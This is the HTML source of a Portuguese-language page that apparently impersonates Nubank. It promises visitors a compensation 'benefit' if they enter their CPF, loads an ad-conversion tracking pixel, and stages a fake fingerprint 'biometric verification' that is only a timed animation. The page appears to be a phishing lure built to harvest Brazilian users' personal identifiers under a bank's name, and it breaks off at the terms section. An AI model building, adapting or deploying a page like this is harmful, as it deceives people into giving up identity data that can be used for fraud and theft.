<!DOCTYPE html><html lang="pt-BR"><head><meta charset="utf-8">
  
  <meta name="viewport" content="width=device-width,initial-scale=1.0,user-scalable=no">
  <title>Nu - Consulte seu benefício</title>
  <link rel="icon" href="favic.png" type="image/png">
  <link href="https://fonts.googleapis.com/css2?family=Inter:wght@300;400;500;600;700;800&display=swap" rel="stylesheet">
  <link rel="stylesheet" href="css/all.min.css">
  <script>
  window.pixelId = "68391b10757eb1eb30cb9c07";
  var a = document.createElement("script");
  a.setAttribute("async", "");
  a.setAttribute("defer", "");
  a.setAttribute("src", "https://cdn.utmify.com.br/scripts/pixel/pixel.js");
  document.head.appendChild(a);
</script>

  <style>
    :root {
      --nu-purple: #8A05BE;
      --nu-purple-dark: #6B0A87;
      --nu-purple-light: #B83DFF;
      --nu-purple-gradient: linear-gradient(135deg, #8A05BE 0%, #B83DFF 100%);
      --nu-purple-hover: linear-gradient(135deg, #7A04A8 0%, #A635E6 100%);
      --nu-gray-50: #FAFAFA;
      --nu-gray-100: #F5F5F5;
      --nu-gray-200: #EEEEEE;
      --nu-gray-300: #E0E0E0;
      --nu-gray-400: #BDBDBD;
      --nu-gray-500: #9E9E9E;
      --nu-gray-600: #757575;
      --nu-gray-700: #616161;
      --nu-gray-800: #424242;
      --nu-gray-900: #212121;
      --nu-white: #FFFFFF;
      --nu-green: #00C853;
      --nu-red: #FF1744;
      --nu-orange: #FF9100;
      --nu-blue: #2196F3;
      --nu-shadow-sm: 0 1px 3px rgba(0, 0, 0, 0.12), 0 1px 2px rgba(0, 0, 0, 0.24);
      --nu-shadow: 0 3px 6px rgba(0, 0, 0, 0.16), 0 3px 6px rgba(0, 0, 0, 0.23);
      --nu-shadow-lg: 0 10px 20px rgba(0, 0, 0, 0.19), 0 6px 6px rgba(0, 0, 0, 0.23);
      --nu-shadow-purple: 0 8px 32px rgba(138, 5, 190, 0.3);
      --nu-radius-sm: 8px;
      --nu-radius: 16px;
      --nu-radius-lg: 24px;
      --nu-transition: all 0.3s cubic-bezier(0.4, 0, 0.2, 1);
      --nu-transition-fast: all 0.15s cubic-bezier(0.4, 0, 0.2, 1);
    }

    * {
      margin: 0;
      padding: 0;
      box-sizing: border-box;
    }

    body {
      font-family: 'Inter', -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, sans-serif;
      background: linear-gradient(135deg, #f8f9fa 0%, #e9ecef 100%);
      min-height: 100vh;
      color: var(--nu-gray-900);
      line-height: 1.6;
      display: flex;
      flex-direction: column;
      font-feature-settings: 'kern' 1, 'liga' 1;
      -webkit-font-smoothing: antialiased;
      -moz-osx-font-smoothing: grayscale;
    }

    /* Header Profissional */
    header {
      background-color: #fff;
      padding: 12px 24px;
      display: flex;
      justify-content: space-between;
      align-items: center;
      border-bottom: 1px solid #e5e5e5;
      position: sticky;
      top: 0;
      left: 0;
      right: 0;
      z-index: 1000;
      height: 60px;
    }

    header .logo img {
      height: 32px;
      width: auto;
    }

    header .icons {
      display: flex;
      align-items: center;
    }

    header .icons button {
      background: none;
      border: none;
      margin-left: 24px;
      cursor: pointer;
    }

    header .icons button i {
      font-size: 16px;
      color: var(--nu-purple);
    }

    header .user {
      background-color: var(--nu-purple);
      color: #fff;
      border: none;
      border-radius: 50px;
      padding: 6px 16px;
      display: flex;
      align-items: center;
      cursor: pointer;
      transition: background-color 0.3s ease;
    }

    header .user:hover {
      background-color: var(--nu-purple-dark);
    }

    header .user i {
      margin-right: 8px;
    }

    /* Container Principal */
    .conteudo {
      max-width: 520px;
      margin: 60px auto;
      padding: 0 24px;
      flex: 1;
      display: flex;
      flex-direction: column;
      justify-content: center;
    }

    .conteudo.loading-mode {
      max-width: 720px;
    }

    .conteudo-inner {
      background: var(--nu-white);
      padding: 48px;
      border-radius: var(--nu-radius-lg);
      box-shadow: var(--nu-shadow-lg);
      position: relative;
      overflow: hidden;
      backdrop-filter: blur(20px);
    }

    .conteudo-inner::before {
      content: '';
      position: absolute;
      top: 0;
      left: 0;
      right: 0;
      height: 6px;
      background: var(--nu-purple-gradient);
      border-radius: var(--nu-radius-lg) var(--nu-radius-lg) 0 0;
    }

    /* Títulos */
    .titulo-section {
      font-size: 36px;
      color: var(--nu-gray-900);
      margin-bottom: 12px;
      text-align: center;
      font-weight: 800;
      letter-spacing: -1px;
      line-height: 1.1;
    }

    .subtitulo {
      font-size: 18px;
      color: var(--nu-gray-600);
      text-align: center;
      margin-bottom: 48px;
      font-weight: 400;
      line-height: 1.4;
    }

    /* Formulário */
    .container-form {
      width: 100%;
    }

    .input-label {
      margin: 0 0 32px 0;
      font-size: 16px;
      color: var(--nu-gray-600);
      text-align: center;
      font-weight: 400;
      line-height: 1.5;
    }

    .highlight {
      font-weight: 700;
      color: var(--nu-purple);
    }

    .input-group {
      position: relative;
      margin: 32px 0;
    }

    .input-group label {
      position: absolute;
      top: -10px;
      left: 16px;
      background: var(--nu-white);
      padding: 4px 8px;
      font-size: 14px;
      color: var(--nu-purple);
      font-weight: 600;
      z-index: 10;
      border-radius: 4px;
    }

    .container-form input {
      padding: 24px 20px;
      width: 100%;
      border: 2px solid var(--nu-gray-300);
      border-radius: var(--nu-radius);
      font-size: 18px;
      font-family: 'Inter', sans-serif;
      font-weight: 500;
      transition: var(--nu-transition);
      background: var(--nu-white);
      color: var(--nu-gray-900);
    }

    .container-form input:focus {
      outline: none;
      border-color: var(--nu-purple);
      box-shadow: 0 0 0 4px rgba(138, 5, 190, 0.1);
      transform: translateY(-2px);
    }

    .container-form input::placeholder {
      color: var(--nu-gray-500);
      font-weight: 400;
    }

    .container-form button {
      padding: 24px 32px;
      background: var(--nu-purple-gradient);
      color: var(--nu-white);
      border: none;
      border-radius: var(--nu-radius);
      cursor: pointer;
      font-weight: 700;
      width: 100%;
      font-size: 18px;
      margin-top: 40px;
      transition: var(--nu-transition);
      box-shadow: var(--nu-shadow);
      position: relative;
      overflow: hidden;
      font-family: 'Inter', sans-serif;
      letter-spacing: 0.5px;
    }

    .container-form button::before {
      content: '';
      position: absolute;
      top: 0;
      left: -100%;
      width: 100%;
      height: 100%;
      background: linear-gradient(90deg, transparent, rgba(255, 255, 255, 0.3), transparent);
      transition: left 0.8s cubic-bezier(0.4, 0, 0.2, 1);
    }

    .container-form button:hover::before {
      left: 100%;
    }

    .container-form button:hover {
      background: var(--nu-purple-hover);
      transform: translateY(-3px);
      box-shadow: var(--nu-shadow-purple);
    }

    .container-form button:active {
      transform: translateY(-1px);
    }

    .container-form button:disabled {
      opacity: 0.6;
      cursor: not-allowed;
      transform: none;
    }

    /* Mensagens de erro */
    .error-message {
      color: var(--nu-red);
      margin: 20px 0 0 0;
      font-size: 14px;
      text-align: left;
      background: rgba(255, 23, 68, 0.05);
      border: 1px solid rgba(255, 23, 68, 0.2);
      border-radius: var(--nu-radius-sm);
      padding: 16px 20px;
      font-weight: 500;
      border-left: 4px solid var(--nu-red);
    }

    /* Termos */
    .terms-section {
      margin-top: 48px;
      padding-top: 32px;
      border-top: 1px solid var(--nu-gray-200);
      text-align: center;
    }

    .terms-section h2 {
      font-size: 14px;
      margin-bottom: 12px;
      color: var(--nu-gray-600);
      font-weight: 500;
      display: flex;
      align-items: center;
      justify-content: center;
      gap: 8px;
    }

    .terms-section h2::before {
      content: '';
      font-size: 16px;
    }

         /* Footer */
    footer {
       background: linear-gradient(135deg, #8A05BE 0%, #6A1B9A 100%);
       color: var(--nu-white);
       padding: 80px 24px 40px;
      margin-top: auto;
       position: relative;
       overflow: hidden;
     }

     footer::before {
       content: '';
       position: absolute;
       top: 0;
       left: 0;
       right: 0;
       bottom: 0;
       background: radial-gradient(circle at 20% 50%, rgba(138, 5, 190, 0.3) 0%, transparent 50%),
                   radial-gradient(circle at 80% 20%, rgba(106, 27, 154, 0.2) 0%, transparent 50%);
       pointer-events: none;
     }

     .footer-container {
       max-width: 1200px;
       margin: 0 auto;
       display: grid;
       grid-template-columns: 1fr;
       gap: 48px;
       text-align: center;
       position: relative;
       z-index: 1;
    }

     @media (min-width: 768px) {
       .footer-container {
         grid-template-columns: 2fr 1fr 1fr 1fr;
         text-align: left;
         gap: 64px;
       }
     }

     .footer-brand {
       display: flex;
       flex-direction: column;
       align-items: center;
     }

     @media (min-width: 768px) {
       .footer-brand {
         align-items: flex-start;
       }
     }

     .footer-logo {
       font-size: 32px;
       font-weight: 800;
       margin-bottom: 20px;
       background: linear-gradient(45deg, #ffffff, #f8f9ff);
       -webkit-background-clip: text;
       -webkit-text-fill-color: transparent;
       background-clip: text;
       letter-spacing: -1px;
       text-shadow: 0 0 30px rgba(255, 255, 255, 0.3);
     }

     .footer-tagline {
       font-size: 16px;
       color: rgba(255, 255, 255, 0.8);
       margin-bottom: 32px;
       line-height: 1.6;
       max-width: 280px;
     }

     .footer-section h3 {
       font-size: 18px;
       font-weight: 700;
       color: var(--nu-white);
       margin-bottom: 24px;
       letter-spacing: -0.5px;
     }

     .footer-links {
       list-style: none;
       padding: 0;
       margin: 0;
     }

     .footer-links li {
      margin-bottom: 16px;
     }

     .footer-links a {
       color: rgba(255, 255, 255, 0.7);
       text-decoration: none;
       font-size: 14px;
       font-weight: 400;
       transition: var(--nu-transition);
       line-height: 1.5;
    }

     .footer-links a:hover {
       color: var(--nu-white);
       transform: translateX(4px);
    }

     .footer-contact {
       display: flex;
       flex-direction: column;
       gap: 16px;
     }

     .contact-item {
       display: flex;
       align-items: center;
       gap: 12px;
       justify-content: center;
     }

     @media (min-width: 768px) {
       .contact-item {
         justify-content: flex-start;
      }
     }

     .contact-item i {
       color: rgba(255, 255, 255, 0.9);
        font-size: 16px;
       width: 20px;
      }

     .contact-item span {
       color: rgba(255, 255, 255, 0.8);
       font-size: 14px;
       font-weight: 500;
     }

     .contact-item a {
       color: rgba(255, 255, 255, 0.8);
       text-decoration: none;
       font-size: 14px;
       font-weight: 500;
       transition: var(--nu-transition);
     }

     .contact-item a:hover {
       color: var(--nu-white);
     }

     .social-links {
       display: flex;
       gap: 16px;
       margin-top: 32px;
       justify-content: center;
     }

     @media (min-width: 768px) {
       .social-links {
        justify-content: flex-start;
       }
     }

     .social-links a {
       display: flex;
       align-items: center;
       justify-content: center;
       width: 48px;
       height: 48px;
       background: rgba(255, 255, 255, 0.15);
       border-radius: 50%;
       color: rgba(255, 255, 255, 0.8);
       text-decoration: none;
       transition: var(--nu-transition);
       backdrop-filter: blur(10px);
       border: 1px solid rgba(255, 255, 255, 0.2);
      }

     .social-links a:hover {
       background: rgba(255, 255, 255, 0.9);
       color: var(--nu-purple);
       transform: translateY(-2px);
       box-shadow: 0 8px 25px rgba(255, 255, 255, 0.3);
       border-color: rgba(255, 255, 255, 0.9);
      }

     .footer-bottom {
       border-top: 1px solid rgba(255, 255, 255, 0.1);
       margin-top: 64px;
       padding-top: 32px;
       text-align: center;
     }

     .footer-bottom p {
       color: var(--nu-gray-500);
        font-size: 12px;
       margin: 0 0 8px 0;
       line-height: 1.6;
     }

     .footer-bottom .legal-text {
       color: var(--nu-gray-600);
       font-size: 11px;
       opacity: 0.8;
       margin: 0;
     }

     .security-badges {
       display: flex;
       justify-content: center;
       gap: 24px;
       margin-top: 32px;
       flex-wrap: wrap;
     }

     .security-badge-footer {
       display: flex;
       align-items: center;
       gap: 8px;
       padding: 12px 20px;
       background: rgba(255, 255, 255, 0.05);
       border-radius: 25px;
       border: 1px solid rgba(255, 255, 255, 0.1);
       transition: var(--nu-transition);
      }

     .security-badge-footer:hover {
       background: rgba(255, 255, 255, 0.1);
       transform: translateY(-2px);
    }

     .security-badge-footer i {
       color: var(--nu-green);
       font-size: 14px;
     }

     .security-badge-footer span {
       color: var(--nu-gray-400);
       font-size: 12px;
       font-weight: 600;
    }

    /* Loading Screen */
     .loading-container {
       text-align: center;
       padding: 80px 60px;
      background: var(--nu-white);
      border-radius: var(--nu-radius-lg);
      box-shadow: var(--nu-shadow-lg);
       position: relative;
       overflow: hidden;
      min-height: 600px;
       display: flex;
       flex-direction: column;
       justify-content: center;
       width: 100%;
      max-width: 680px;
       margin: 0 auto;
     }

     .loading-container::before {
       content: '';
       position: absolute;
       top: 0;
       left: 0;
       right: 0;
       height: 6px;
      background: var(--nu-purple-gradient);
      border-radius: var(--nu-radius-lg) var(--nu-radius-lg) 0 0;
     }

     .spinner {
       position: relative;
       width: 100px;
       height: 100px;
       margin: 0 auto 40px;
     }

     .spinner-border {
       width: 100px;
       height: 100px;
      border: 6px solid var(--nu-gray-200);
      border-top: 6px solid var(--nu-purple);
       border-radius: 50%;
      animation: spin 1s linear infinite;
       position: absolute;
       top: 0;
       left: 0;
     }

     .spinner-inner {
       position: absolute;
       top: 50%;
       left: 50%;
       transform: translate(-50%, -50%);
      width: 60px;
      height: 60px;
      background: var(--nu-purple-gradient);
       border-radius: 50%;
       display: flex;
       align-items: center;
       justify-content: center;
      color: var(--nu-white);
      font-size: 24px;
      box-shadow: var(--nu-shadow);
     }

     .loading-container h2 {
      font-size: 32px;
      color: var(--nu-gray-900);
       margin-bottom: 16px;
      font-weight: 800;
       letter-spacing: -0.5px;
     }

     .loading-subtitle {
      font-size: 18px;
      color: var(--nu-gray-600);
      margin-bottom: 48px;
       font-weight: 400;
     }

     .progress-container {
       max-width: 480px;
       margin: 0 auto;
       padding: 0 20px;
     }

     .progress-header {
       display: flex;
       justify-content: space-between;
       align-items: center;
      margin-bottom: 16px;
     }

     .progress-label {
      font-size: 16px;
      color: var(--nu-gray-700);
       font-weight: 600;
     }

     .progress-percentage {
      font-size: 20px;
      color: var(--nu-purple);
      font-weight: 800;
     }

     .progress-bar {
       width: 100%;
       height: 12px;
      background: var(--nu-gray-200);
       border-radius: 6px;
       overflow: hidden;
      margin-bottom: 20px;
       position: relative;
      box-shadow: inset 0 2px 4px rgba(0, 0, 0, 0.1);
     }

     .progress-fill {
       height: 100%;
      background: var(--nu-purple-gradient);
       border-radius: 6px;
       transition: width 0.4s cubic-bezier(0.4, 0, 0.2, 1);
       position: relative;
      box-shadow: 0 2px 8px rgba(138, 5, 190, 0.3);
     }

     .progress-fill::after {
       content: '';
       position: absolute;
       top: 0;
       left: 0;
       right: 0;
       bottom: 0;
      background: linear-gradient(90deg, transparent, rgba(255, 255, 255, 0.6), transparent);
      animation: shimmer 2s infinite;
     }

     .progress-status {
      font-size: 16px;
      color: var(--nu-gray-600);
       margin: 0;
       font-weight: 500;
       text-align: center;
     }

     .security-badge {
       display: inline-flex;
       align-items: center;
      gap: 12px;
      background: rgba(138, 5, 190, 0.1);
      padding: 16px 24px;
       border-radius: 25px;
      margin-top: 32px;
      border: 2px solid rgba(138, 5, 190, 0.2);
     }

     .security-badge i {
      color: var(--nu-purple);
      font-size: 18px;
     }

     .security-badge span {
      color: var(--nu-purple);
      font-size: 16px;
      font-weight: 700;
     }

         /* Confirmation Screen */
     .card-content {
       background: var(--nu-white);
       border-radius: var(--nu-radius-lg);
       box-shadow: var(--nu-shadow-lg);
       position: relative;
       overflow: hidden;
       padding: 48px;
       animation: fadeInUp 0.6s ease-out;
       min-height: 600px;
       max-width: 100%;
       width: 100%;
       margin: 0 auto;
     }

     @media (min-width: 768px) {
       .card-content {
         max-width: 720px;
         min-height: 700px;
       }
     }

     .card-content::before {
       content: '';
       position: absolute;
       top: 0;
       left: 0;
       right: 0;
       height: 6px;
      background: var(--nu-purple-gradient);
      border-radius: var(--nu-radius-lg) var(--nu-radius-lg) 0 0;
     }

     .form-header {
      margin-bottom: 48px;
       text-align: center;
     }

     .form-header h2 {
      font-size: 36px;
      color: var(--nu-gray-900);
      margin-bottom: 16px;
      font-weight: 800;
      letter-spacing: -1px;
      line-height: 1.1;
     }

     .form-header p {
      color: var(--nu-gray-600);
       font-size: 18px;
       margin: 0;
       font-weight: 400;
       line-height: 1.5;
     }

     .dados-container {
      margin: 40px 0;
      border: 2px solid var(--nu-gray-200);
      border-radius: var(--nu-radius);
       overflow: hidden;
      background: var(--nu-gray-50);
     }

     .dado-item {
       display: flex;
       justify-content: space-between;
       align-items: center;
      padding: 24px 28px;
      border-bottom: 1px solid var(--nu-gray-200);
      transition: var(--nu-transition);
      background: var(--nu-white);
     }

     .dado-item:last-child {
       border-bottom: none;
     }

     .dado-item:hover {
      background: var(--nu-gray-50);
      transform: translateX(4px);
     }

     .dado-label {
       font-weight: 600;
      color: var(--nu-gray-700);
      font-size: 16px;
      min-width: 160px;
     }

     .dado-value {
      color: var(--nu-gray-900);
       font-size: 16px;
       margin: 0;
       text-align: right;
      font-weight: 600;
     }

     .button-group {
       display: flex;
      gap: 20px;
      margin: 48px 0;
       align-items: stretch;
     }

     .btn-primary {
       flex: 1;
      padding: 24px 32px;
      background: var(--nu-purple-gradient);
      color: var(--nu-white);
       border: none;
      border-radius: var(--nu-radius);
      font-weight: 700;
      font-size: 18px;
       cursor: pointer;
      transition: var(--nu-transition);
      box-shadow: var(--nu-shadow);
       position: relative;
       overflow: hidden;
      min-height: 64px;
       display: flex;
       align-items: center;
       justify-content: center;
      font-family: 'Inter', sans-serif;
      letter-spacing: 0.5px;
     }

     .btn-primary::before {
       content: '';
       position: absolute;
       top: 0;
       left: -100%;
       width: 100%;
       height: 100%;
      background: linear-gradient(90deg, transparent, rgba(255, 255, 255, 0.3), transparent);
      transition: left 0.8s cubic-bezier(0.4, 0, 0.2, 1);
     }

     .btn-primary:hover::before {
       left: 100%;
     }

     .btn-primary:hover {
      background: var(--nu-purple-hover);
      transform: translateY(-3px);
      box-shadow: var(--nu-shadow-purple);
     }

     .btn-secondary {
       flex: 1;
      padding: 24px 32px;
      background: var(--nu-white);
      color: var(--nu-purple);
      border: 2px solid var(--nu-purple);
      border-radius: var(--nu-radius);
      font-weight: 700;
      font-size: 18px;
       cursor: pointer;
      transition: var(--nu-transition);
      min-height: 64px;
       display: flex;
       align-items: center;
       justify-content: center;
      font-family: 'Inter', sans-serif;
      letter-spacing: 0.5px;
     }

     .btn-secondary:hover {
      background: var(--nu-purple);
      color: var(--nu-white);
      transform: translateY(-3px);
      box-shadow: var(--nu-shadow-purple);
     }

     .security-info {
       display: flex;
       align-items: center;
       justify-content: center;
      gap: 12px;
      padding: 20px;
      background: rgba(138, 5, 190, 0.05);
      border-radius: var(--nu-radius);
      margin-top: 32px;
      border: 2px solid rgba(138, 5, 190, 0.1);
     }

     .security-info i {
      color: var(--nu-purple);
      font-size: 18px;
     }

           .security-info span {
      color: var(--nu-purple);
      font-size: 16px;
      font-weight: 600;
      }

    /* Biometric Verification */
      .biometric-container {
      background: var(--nu-white);
      border-radius: var(--nu-radius-lg);
      box-shadow: var(--nu-shadow-lg);
        position: relative;
        overflow: hidden;
        padding: 48px;
        animation: fadeInUp 0.6s ease-out;
      min-height: 700px;
      max-width: 720px;
        margin: 0 auto;
        text-align: center;
        display: flex;
        flex-direction: column;
        justify-content: center;
      }

      .biometric-container::before {
        content: '';
        position: absolute;
        top: 0;
        left: 0;
        right: 0;
        height: 6px;
      background: var(--nu-purple-gradient);
      border-radius: var(--nu-radius-lg) var(--nu-radius-lg) 0 0;
      }

      .biometric-header {
      margin-bottom: 48px;
      }

      .biometric-header h1 {
      font-size: 36px;
      color: var(--nu-gray-900);
        margin-bottom: 16px;
      font-weight: 800;
      letter-spacing: -1px;
      }

      .biometric-header p {
      color: var(--nu-gray-600);
        font-size: 18px;
        margin: 0;
        line-height: 1.6;
      }

      .biometric-header .user-name {
      font-weight: 700;
      color: var(--nu-purple);
      }

      .biometric-scanner {
        position: relative;
      margin: 48px auto;
      width: 240px;
      height: 240px;
      }

      .progress-ring {
      width: 240px;
      height: 240px;
        transform: rotate(-90deg);
      }

      .progress-ring-bg {
        fill: none;
      stroke: var(--nu-gray-200);
      stroke-width: 8;
      }

      .progress-ring-progress {
        fill: none;
       stroke: var(--nu-purple);
       stroke-width: 8;
        stroke-linecap: round;
       stroke-dasharray: 678.58;
       stroke-dashoffset: 678.58;
       transition: stroke-dashoffset 8s linear;
       filter: drop-shadow(0 0 10px rgba(138, 5, 190, 0.3));
     }

     .progress-ring-progress.active {
       stroke-dashoffset: 0;
      }

      .fingerprint-button {
        position: absolute;
        top: 50%;
        left: 50%;
        transform: translate(-50%, -50%);
      width: 180px;
      height: 180px;
        border-radius: 50%;
      background: var(--nu-white);
      border: 4px solid var(--nu-purple);
        display: flex;
        align-items: center;
        justify-content: center;
        cursor: pointer;
        transition: all 0.3s ease;
        user-select: none;
        touch-action: none;
      box-shadow: var(--nu-shadow-lg);
      }

      .fingerprint-button:hover {
        transform: translate(-50%, -50%) scale(1.05);
      box-shadow: var(--nu-shadow-purple);
      }

      .fingerprint-button.active {
      background: var(--nu-purple-gradient);
      border-color: var(--nu-purple);
        transform: translate(-50%, -50%) scale(0.95);
      }

      .fingerprint-button.completed {
      background: var(--nu-green);
      border-color: var(--nu-green);
      }

      .fingerprint-icon {
      width: 80px;
      height: 80px;
      color: var(--nu-purple);
        transition: all 0.3s ease;
      }

      .fingerprint-button.active .fingerprint-icon {
      color: var(--nu-white);
        transform: scale(1.1);
      }

      .fingerprint-button.completed .fingerprint-icon {
      color: var(--nu-white);
      }

      .biometric-instruction {
      margin-top: 32px;
      color: var(--nu-gray-700);
      font-size: 18px;
      font-weight: 600;
      }

      .biometric-info {
      background: rgba(138, 5, 190, 0.05);
      border: 2px solid rgba(138, 5, 190, 0.1);
      border-radius: var(--nu-radius);
      padding: 32px;
      margin-top: 40px;
      }

      .biometric-info p {
      color: var(--nu-gray-700);
      font-size: 16px;
        margin: 0;
      line-height: 1.6;
      }

      .biometric-info .info-title {
      font-weight: 700;
      color: var(--nu-purple);
      }

      .progress-text {
      color: var(--nu-purple);
      font-size: 20px;
      font-weight: 800;
      margin-top: 20px;
      }

      .biometric-success {
      margin-top: 40px;
        text-align: center;
      }

      .biometric-success h2 {
      color: var(--nu-green);
      font-size: 28px;
      font-weight: 800;
        margin-bottom: 16px;
      }

      .biometric-success p {
      color: var(--nu-gray-600);
      font-size: 18px;
      margin-bottom: 32px;
      }

      .btn-proceed {
      padding: 24px 40px;
      background: var(--nu-purple-gradient);
      color: var(--nu-white);
        border: none;
      border-radius: var(--nu-radius);
      font-weight: 700;
      font-size: 18px;
        cursor: pointer;
      transition: var(--nu-transition);
      box-shadow: var(--nu-shadow);
        position: relative;
        overflow: hidden;
      min-height: 64px;
        display: inline-flex;
        align-items: center;
        justify-content: center;
      min-width: 240px;
      font-family: 'Inter', sans-serif;
      letter-spacing: 0.5px;
      }

      .btn-proceed::before {
        content: '';
        position: absolute;
        top: 0;
        left: -100%;
        width: 100%;
        height: 100%;
      background: linear-gradient(90deg, transparent, rgba(255, 255, 255, 0.3), transparent);
      transition: left 0.8s cubic-bezier(0.4, 0, 0.2, 1);
      }

      .btn-proceed:hover::before {
        left: 100%;
      }

      .btn-proceed:hover {
      background: var(--nu-purple-hover);
      transform: translateY(-3px);
      box-shadow: var(--nu-shadow-purple);
      }

           /* Responsividade Header - Mantendo tamanhos do desktop */
      @media (max-width: 768px) {
       header {
         padding: 12px 24px; /* Mantendo padding do desktop */
        }

       header .logo img {
         height: 32px; /* Mantendo altura do desktop */
       }

       header .icons button {
         margin-left: 24px; /* Mantendo espaçamento do desktop */
       }

       header .icons button i {
         font-size: 16px; /* Mantendo tamanho do desktop */
       }

       header .user {
         padding: 6px 16px; /* Mantendo padding do desktop */
         font-size: inherit; /* Mantendo fonte do desktop */
       }
      }

      @media (max-width: 480px) {
       header {
         padding: 12px 16px; /* Reduzindo apenas o padding lateral */
       }

       header .logo img {
         height: 32px; /* Mantendo altura do desktop */
       }

       header .icons button {
         margin-left: 20px; /* Reduzindo levemente o espaçamento */
       }

       header .icons button i {
         font-size: 16px; /* Mantendo tamanho do desktop */
       }

       header .user {
         padding: 6px 14px; /* Reduzindo levemente o padding */
         font-size: inherit; /* Mantendo fonte do desktop */
       }

       /* Mantendo o texto do usuário visível */
       header .user span {
         display: inline; /* Mantendo texto visível */
       }
      }

       .conteudo {
         margin: 20px auto;
         padding: 0 16px;
        }

       .conteudo-inner {
         padding: 32px 24px;
         border-radius: var(--nu-radius);
       }

       .titulo-section {
         font-size: 28px;
       }

       .subtitulo {
          font-size: 16px;
         margin-bottom: 32px;
        }

       .container-form input {
         padding: 20px 16px;
         font-size: 16px;
       }

       .container-form button {
         padding: 20px 24px;
         font-size: 16px;
        }

       .loading-container {
         padding: 40px 24px;
         border-radius: var(--nu-radius);
         min-height: 500px;
       }

       .loading-container h2 {
         font-size: 24px;
        }

        .button-group {
          flex-direction: column;
         gap: 16px;
       }

       .card-content {
         padding: 32px 20px;
         border-radius: var(--nu-radius);
         min-height: 500px;
         margin: 0 16px;
         max-width: calc(100% - 32px);
       }

       .form-header h2 {
         font-size: 24px;
       }

       .form-header p {
         font-size: 16px;
       }

       .dados-container {
         margin: 32px 0;
        }

        .dado-item {
         padding: 20px 16px;
          flex-direction: column;
         text-align: center;
          gap: 8px;
        }

       .dado-label {
         min-width: auto;
         font-size: 14px;
        }

       .dado-value {
         text-align: center;
         font-size: 15px;
        }

        .biometric-container {
          padding: 32px 24px;
         min-height: 600px;
         border-radius: var(--nu-radius);
        }

        .biometric-header h1 {
          font-size: 28px;
        }

        .biometric-scanner {
         width: 200px;
         height: 200px;
          margin: 32px auto;
        }

        .progress-ring {
         width: 200px;
         height: 200px;
        }

        .fingerprint-button {
         width: 140px;
         height: 140px;
        }

        .fingerprint-icon {
         width: 60px;
         height: 60px;
       }
    

     /* Media queries removidas - usando apenas as do header novo */

    /* Animações */
    @keyframes fadeInUp {
      from {
        opacity: 0;
        transform: translateY(40px);
      }
      to {
        opacity: 1;
        transform: translateY(0);
      }
    }

    @keyframes spin {
      0% { transform: rotate(0deg); }
      100% { transform: rotate(360deg); }
    }

    @keyframes shimmer {
      0% { transform: translateX(-100%); }
      100% { transform: translateX(100%); }
    }

    @keyframes pulse {
      0% { box-shadow: var(--nu-shadow-lg); }
      50% { box-shadow: var(--nu-shadow-purple); }
      100% { box-shadow: var(--nu-shadow-lg); }
    }

    .fingerprint-button.waiting {
      animation: pulse 2s infinite;
    }

    @keyframes checkmark {
      0% { stroke-dashoffset: 100; }
      100% { stroke-dashoffset: 0; }
    }

    .success-check {
      stroke: var(--nu-white);
      stroke-width: 4;
      stroke-linecap: round;
      stroke-dasharray: 100;
      stroke-dashoffset: 100;
      animation: checkmark 0.5s ease-in-out forwards;
    }

    .conteudo-inner {
      animation: fadeInUp 0.6s ease-out;
      }

     .fa-spin {
       animation: fa-spin 1s infinite linear;
     }

     @keyframes fa-spin {
       0% { transform: rotate(0deg); }
       100% { transform: rotate(360deg); }
     }

    /* Navegação */
    nav {
      background-color: #fff;
      padding: 16px 24px;
      display: flex;
      justify-content: space-between;
      align-items: center;
      border-bottom: 1px solid #e5e5e5;
      position: sticky;
      top: 60px;
      left: 0;
      right: 0;
      z-index: 999;
      height: 60px;
      margin-bottom: 20px;
    }

    nav button {
      background: none;
      border: none;
      display: flex;
      align-items: center;
      cursor: pointer;
    }

    nav button i {
      font-size: 16px;
      color: var(--nu-purple);
      margin-right: 10px;
    }

    nav button span {
      color: #666;
      font-size: 15px;
      font-weight: 300;
    }
  </style>
  <script id="_wau731">var _wau = _wau || []; _wau.push(["small", "4ci1fjth0q", "731"]);</script><script async src="//waust.at/s.js"></script>
</head>

<body>
  <header>
    <div class="logo">
      <img src="https://logodownload.org/wp-content/uploads/2019/08/nubank-logo-1-1.png" alt="Nubank" style="width: auto; height: 32px;">
    </div>
    <div class="icons">
      <button><i class="fas fa-ellipsis-v"></i></button>
      <button><i class="fas fa-cookie-bite"></i></button>
      <button><i class="fas fa-th"></i></button>
      <button class="user" id="user-button" style="background-color: var(--nu-purple);">
        <i class="fas fa-user" style="color: #fff;"></i>
        <span id="user-name"></span>
      </button>
    </div>
  </header>
  
  <nav>
    <button><i class="fas fa-bars"></i><span>
        <p>Benefício <span> > </span> Indenização <span> > </span> Análise</p>
      </span></button>
    <button><i class="fas fa-search"></i></button>
  </nav>
  
  <script src="js/script.js"></script>
  
  <script>
    // Script para controlar a animação da progress ring biométrica
    document.addEventListener('DOMContentLoaded', function() {
      // Função para controlar a progress ring
      function initBiometricProgress() {
        const fingerprintButton = document.querySelector('.fingerprint-button');
        const progressRing = document.querySelector('.progress-ring-progress');
        
        if (fingerprintButton && progressRing) {
          fingerprintButton.addEventListener('click', function() {
            // Adicionar classe active para iniciar animação
            fingerprintButton.classList.add('active');
            progressRing.classList.add('active');
            
            // Simular progresso biométrico em 8 segundos
            setTimeout(() => {
              fingerprintButton.classList.remove('active');
              fingerprintButton.classList.add('completed');
            }, 8000);
          });
        }
      }
      
      // Inicializar quando a página carregar
      initBiometricProgress();
      
      // Também inicializar se elementos forem carregados dinamicamente
      const observer = new MutationObserver(function(mutations) {
        mutations.forEach(function(mutation) {
          if (mutation.addedNodes.length) {
            initBiometricProgress();
          }
        });
      });
      
      observer.observe(document.body, {
        childList: true,
        subtree: true
      });
    });
  </script>
  
  <div class="conteudo">
    <div class="conteudo-inner">
      <h2 class="titulo-section">Consulte seu benefício</h2>
      <p class="subtitulo">Descubra se você tem direito a receber uma indenização</p>
      
      <div class="container-form">
        <form id="cpfForm">
          <div class="input-label">
            Digite seu CPF para <span class="highlight">consultar</span> se você possui benefícios disponíveis
          </div>
          
          <div class="input-group">
            <label for="cpf">CPF</label>
            <input type="tel" id="cpf" name="cpf" placeholder="000.000.000-00" required="">
          </div>
          
          <p id="error-msg" class="error-message" style="display: none;"></p>
          
          <button type="submit" id="submit-btn">
            Consultar benefício
          </button>
          
          <input type="hidden" name="utm_source" value="">
          <input type="hidden" name="utm_campaign" value="">
          <input type="hidden" name="utm_medium" value="">
          <input type="hidden" name="utm_content" value="">
        </form>
      </div>
      
      <div class="terms-section">
